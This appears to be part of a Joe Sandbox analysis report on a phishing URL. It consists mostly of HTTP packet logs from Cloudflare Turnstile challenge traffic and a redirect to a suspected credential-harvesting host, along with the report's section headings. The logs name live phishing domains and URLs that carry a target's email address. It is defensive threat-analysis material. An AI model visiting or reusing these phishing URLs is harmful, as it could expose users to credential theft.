2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 20 73 70 61 63 65 2d 65 76 65 6e 6c 79 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6f 76 65 72 72 75 6e 2d 74 65 78 74 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 65 78 70 69 72 65 64 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 2c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 7b 6d 61 72 67 69 6e 3a 30 Data Ascii: ontent:center space-evenly;visibility:visible}.size-compact #expired-text,.size-compact #overrun-text,.size-compact #timeout-text{display:block}.size-compact #expired-refresh-link,.size-compact #timeout-refresh-link,.size-compact .error-message a{margin:0
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 7d 23 74 65 72 6d 73 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 30 70 78 7d 23 74 65 72 6d 73 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 20 2e 32 72 65 6d 7d 23 74 65 72 6d 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 23 74 65 72 6d 73 20 61 2c 23 74 65 72 6d 73 20 61 3a 6c 69 6e 6b 2c 23 74 65 72 6d 73 20 61 3a 76 69 73 69 74 65 64 7b 63 6f Data Ascii: {margin-left:0;margin-right:16px}#terms{color:#232323;display:inline-flex;font-size:8px;font-style:normal;justify-content:flex-end;line-height:10px}#terms .link-spacer{margin:0 .2rem}#terms a{display:inline-block}#terms a,#terms a:link,#terms a:visited{co

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:34 UTC	772	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9261293dee55c468&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:34 UTC	331	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:34 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 120617 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 926129417814b4c6-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:34 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 43 75 55 53 37 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 Data Ascii: window._cf_chl_opt.CuUS7={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23brow
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 Data Ascii: 0clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","unsupported_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%2
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 61 75 78 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 67 75 69 64 65 6c 69 6e 65 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 65 4d 2c 65 4e 2c 65 4f 2c 65 50 2c 65 54 2c 65 55 2c 66 34 2c 66 38 2c 66 62 2c 66 63 2c 66 43 2c 66 46 2c 66 49 2c 66 4b 2c 66 4c 2c 66 Data Ascii: nt%20page.","turnstile_expired":"Expired"},"polyfills":{"feedback_report_aux_subtitle":false,"feedback_report_output_subtitle":false,"feedback_report_guideline":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eP,eT,eU,f4,f8,fb,fc,fC,fF,fI,fK,fL,f
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 67 50 28 34 36 38 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4e 28 31 36 38 31 29 5d 5b 67 4e 28 37 39 38 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 67 4e 28 31 30 31 30 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 65 52 28 67 2c 68 2c 44 29 2c 6f 5b 67 4e 28 31 35 39 35 29 5d 28 42 2c 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 67 4e 28 31 38 35 39 29 5d 28 68 5b 44 5d 29 2c 6f 5b 67 4e 28 38 36 35 29 5d 3d 3d 3d 69 2b 44 3f 6f 5b 67 4e 28 31 30 37 34 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 6f 5b 67 4e 28 38 31 36 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 67 4e 28 38 31 36 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 Data Ascii: gP(468)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[gN(1681)][gN(798)](B),C=0;C<x[gN(1010)];D=x[C],E=eR(g,h,D),o[gN(1595)](B,E)?(F=E==='s'&&!g[gN(1859)](h[D]),o[gN(865)]===i+D?o[gN(1074)](s,i+D,E):F\|\|o[gN(816)](s,i+D,h[D])):o[gN(816)](s,i+D,E),C
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 74 75 72 6e 20 68 2b 69 7d 2c 27 63 4f 4c 73 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 7a 67 73 45 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 43 73 6c 50 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 67 79 62 6a 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 63 69 55 78 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 72 71 6d 50 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4e 73 59 52 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 6a 4f 4b 6d Data Ascii: turn h+i},'cOLsT':function(h,i){return h-i},'zgsEf':function(h,i){return i\|h},'CslPG':function(h,i){return h-i},'gybjS':function(h,i){return i&h},'ciUxq':function(h,i){return h-i},'rqmPg':function(h,i){return h-i},'NsYRo':function(h,i){return h!==i},'jOKm
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 2e 68 5b 74 68 69 73 2e 67 5e 31 37 34 5d 5b 33 5d 2c 64 5b 68 49 28 31 37 38 35 29 5d 28 64 5b 68 49 28 38 30 39 29 5d 28 64 5b 68 49 28 31 37 31 30 29 5d 28 74 68 69 73 2e 68 5b 31 37 34 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 49 28 31 32 38 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 37 34 2e 35 34 5d 5b 30 5d 2b 2b 29 2c 35 38 29 2c 32 35 36 29 2c 32 35 35 29 29 5e 38 31 2e 36 2c 6b 3d 74 68 69 73 2e 68 5b 64 5b 68 49 28 38 38 39 29 5d 28 6b 2c 74 68 69 73 2e 67 29 5d 2c 6c 3d 64 5b 68 49 28 37 36 39 29 5d 28 64 5b 68 49 28 38 38 39 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 37 34 5d 5b 33 5d 2c 64 5b 68 49 28 31 37 38 35 29 5d 28 64 5b 68 49 28 38 30 39 29 5d 28 64 5b 68 49 28 31 33 32 34 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 Data Ascii: .h[this.g^174][3],d[hI(1785)](d[hI(809)](d[hI(1710)](this.h[174^this.g][1][hI(1286)](this.h[this.g^174.54][0]++),58),256),255))^81.6,k=this.h[d[hI(889)](k,this.g)],l=d[hI(769)](d[hI(889)](this.h[this.g^174][3],d[hI(1785)](d[hI(809)](d[hI(1324)](this.h[thi
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 27 3a 44 5b 4f 5d 3d 48 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 47 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 68 4b 28 35 37 38 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 46 3d 64 5b 68 4b 28 31 30 37 37 29 5d 28 53 74 72 69 6e 67 2c 4e 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 69 66 28 4f 62 6a 65 63 74 5b 68 4b 28 31 33 38 34 29 5d 5b 68 4b 28 31 30 39 36 29 5d 5b 68 4b 28 34 39 31 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 68 4b 28 31 32 38 36 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 64 5b 68 4b 28 31 30 39 33 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 64 5b 68 4b 28 36 35 34 29 5d 28 4c 2c 6f 2d 31 Data Ascii: ':D[O]=H++;continue;case'1':G--;continue;case'2':0==G&&(G=Math[hK(578)](2,I),I++);continue;case'3':F=d[hK(1077)](String,N);continue;case'4':if(Object[hK(1384)][hK(1096)][hK(491)](E,F)){if(256>F[hK(1286)](0)){for(C=0;d[hK(1093)](C,I);K<<=1,d[hK(654)](L,o-1
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 2b 2b 29 3b 66 6f 72 28 52 3d 46 5b 68 4b 28 31 32 38 36 29 5d 28 30 29 2c 43 3d 30 3b 38 3e 43 3b 4b 3d 4b 3c 3c 31 2e 38 36 7c 64 5b 68 4b 28 31 30 30 36 29 5d 28 52 2c 31 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 68 4b 28 37 30 31 29 5d 28 64 5b 68 4b 28 31 38 34 36 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 52 3d 31 2c 43 3d 30 3b 64 5b 68 4b 28 36 35 38 29 5d 28 43 2c 49 29 3b 4b 3d 4b 3c 3c 31 7c 52 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 68 4b 28 37 30 31 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 52 3d 46 5b 68 4b 28 31 32 38 36 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 68 4b 28 37 36 39 29 5d 28 4b Data Ascii: ++);for(R=F[hK(1286)](0),C=0;8>C;K=K<<1.86\|d[hK(1006)](R,1),o-1==L?(L=0,J[hK(701)](d[hK(1846)](s,K)),K=0):L++,R>>=1,C++);}else{for(R=1,C=0;d[hK(658)](C,I);K=K<<1\|R,L==o-1?(L=0,J[hK(701)](s(K)),K=0):L++,R=0,C++);for(R=F[hK(1286)](0),C=0;16>C;K=d[hK(769)](K
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 28 64 5b 68 4e 28 31 30 39 33 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 4e 28 31 30 39 37 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 4e 28 35 37 38 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 4e 28 35 37 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 4e 28 31 34 32 32 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 68 4e 28 37 30 31 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 Data Ascii: (d[hN(1093)](0,N)?1:0)F,F<<=1);O=d[hN(1097)](e,J);break;case 1:for(J=0,K=Math[hN(578)](2,16),F=1;K!=F;N=H&G,H>>=1,d[hN(571)](0,H)&&(H=j,G=o(I++)),J\|=(0<N?1:0)F,F<<=1);O=d[hN(1422)](e,J);break;case 2:return''}for(E=s[3]=O,D[hN(701)](O);;){if(I>i)return''
2025-03-25 20:29:34 UTC	1369	IN	Data Raw: 2b 67 29 29 3b 69 5b 69 73 28 37 30 31 29 5d 28 53 74 72 69 6e 67 5b 69 73 28 36 33 36 29 5d 28 28 66 5b 69 73 28 31 30 30 35 29 5d 28 28 32 35 35 26 6b 29 2d 68 2c 67 25 36 35 35 33 35 29 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 73 28 38 31 35 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 4a 28 39 35 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 75 2c 64 2c 65 2c 66 2c 67 29 7b 69 75 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 75 28 38 39 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 64 5b 69 75 28 37 35 37 29 5d 3d 69 75 28 31 31 35 32 29 2c 64 5b 69 75 28 31 35 31 31 29 5d 3d 69 75 28 36 38 31 29 2c 64 5b 69 75 28 31 31 37 36 29 5d 3d 69 75 28 31 34 33 33 29 2c 64 5b 69 75 28 37 37 35 29 5d Data Ascii: +g));i[is(701)](String[is(636)]((f[is(1005)]((255&k)-h,g%65535)+65535)%255)));return i[is(815)]('')},eM[gJ(958)]=function(iu,d,e,f,g){iu=gJ,d={},d[iu(898)]=function(h,i){return h!==i},d[iu(757)]=iu(1152),d[iu(1511)]=iu(681),d[iu(1176)]=iu(1433),d[iu(775)]

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:34 UTC	784	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:34 UTC	240	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:34 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 92612941891b862e-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:34 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:34 UTC	851	OUT	GET /favicon.ico HTTP/1.1 Host: sso.ninerscorretora.com.br Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
2025-03-25 20:29:35 UTC	122	IN	HTTP/1.1 500 Internal Server Error Date: Tue, 25 Mar 2025 20:29:35 GMT Connection: close Transfer-Encoding: chunked
2025-03-25 20:29:35 UTC	33	IN	Data Raw: 31 36 0d 0a 3c 68 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 16<h1>Access Denied</h1>0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:34 UTC	1190	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 3620 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 cf-chl: 5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI cf-chl-ra: 0 sec-ch-ua-mobile: ?0 Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:34 UTC	3620	OUT	Data Raw: 49 6d 6c 70 45 70 46 70 48 70 6c 70 32 66 61 78 66 61 4e 70 66 44 4c 57 55 63 66 43 61 55 61 50 6a 44 75 2b 37 61 38 69 57 70 2d 37 4c 69 61 47 61 30 37 55 57 79 37 36 46 53 79 61 43 37 75 79 61 68 61 49 24 70 61 45 69 70 61 42 75 61 42 4f 6d 36 59 61 48 6c 56 69 69 79 75 37 4c 6e 61 4b 44 4c 50 61 48 77 4b 4e 56 61 59 70 61 53 61 6f 7a 68 46 32 53 61 6c 4e 43 30 67 61 43 6d 36 6f 43 48 56 43 6c 33 36 70 43 4e 77 4a 6b 6b 34 30 49 56 42 58 2b 37 61 69 35 35 32 79 44 7a 48 66 2b 30 61 55 42 4f 4b 4e 44 72 49 4e 61 45 48 5a 63 6f 49 7a 31 31 48 70 6d 30 4c 61 36 4e 42 36 4b 72 4f 69 63 6c 61 4c 2b 46 61 4c 79 64 61 66 69 36 6c 44 61 6b 61 43 35 61 37 6f 77 6f 61 7a 72 46 61 69 74 77 43 72 70 61 48 50 57 38 58 6f 79 63 43 69 34 6c 48 77 38 61 42 63 67 64 6e Data Ascii: ImlpEpFpHplp2faxfaNpfDLWUcfCaUaPjDu+7a8iWp-7LiaGa07UWy76FSyaC7uyahaI$paEipaBuaBOm6YaHlViiyu7LnaKDLPaHwKNVaYpaSaozhF2SalNC0gaCm6oCHVCl36pCNwJkk40IVBX+7ai552yDzHf+0aUBOKNDrINaEHZcoIz11Hpm0La6NB6KrOiclaL+FaLydafi6lDakaC5a7owoazrFaitwCrpaHPW8XoycCi4lHw8aBcgdn
2025-03-25 20:29:35 UTC	1115	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:35 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 242024 Connection: close cf-chl-gen: UI3ab11IInXO6UDiwk+2Xdvf1+AwW0vMbxHwyMHJP8TGBFqLOS2JNh3uhPOTMYOu10hE4yPrclUZi1Yz4fu63OeC0HBYyf6IXr9HYN63vuAEB9PBBd//yn3RckH2iO0qORh90eYU1uIjzB3YFTc6qFCfj8fmBQY7YkgfxBtWJy3QCfOjd9rH9esBHmWCEAoP+qHWzmI6gAOR9CNYK03iY0cz1/O0WOO9gQfNyTI4EB9yf6Beq2yh0V03ki/ZG86QNqAIQ7Lypf1SoGZFZ0oIJhpo2r4BXLsac2qELyvGXVEix6u7DjR9F3Md1H5FiXVE9DV96fVfIcTgwsbHfDcKVhveJHJMgfo+3QH9rWYhaXUVpAP1NXrRPq4u+xPwukXI2ALVrS7+NMr9d8omiqn+UkY5kbxE/EdRWJAPL+o0loJL5quQZB05KTJCKL8UqYWAAzVvgfnDm4DahN3A3a6RJISB6ZbsSHTh7b6L4K7UA1hW+6tk+be7zgByElSs0mrFd3lG1SdNMyQtWom1cRzks4sYaWOgey/xnUxUaaMn9NUzb5UexNarXU2KD+KRwV4XZQtm9b6rE06LhznHlID8+05EFWoLXcEP4c7FOnttGfEMy5i6+HJckp3vjL2RvCmJ08Rl14YxXEkR/XKTltrD16udTZ1hJSgpRhGVe3N3j3L+aUSQKyPqkptEXPcZk6MY9rk2L+jSlg2QKl8r3DwbdXLB+NIip3GqpQmnqjKqnOKSW86WN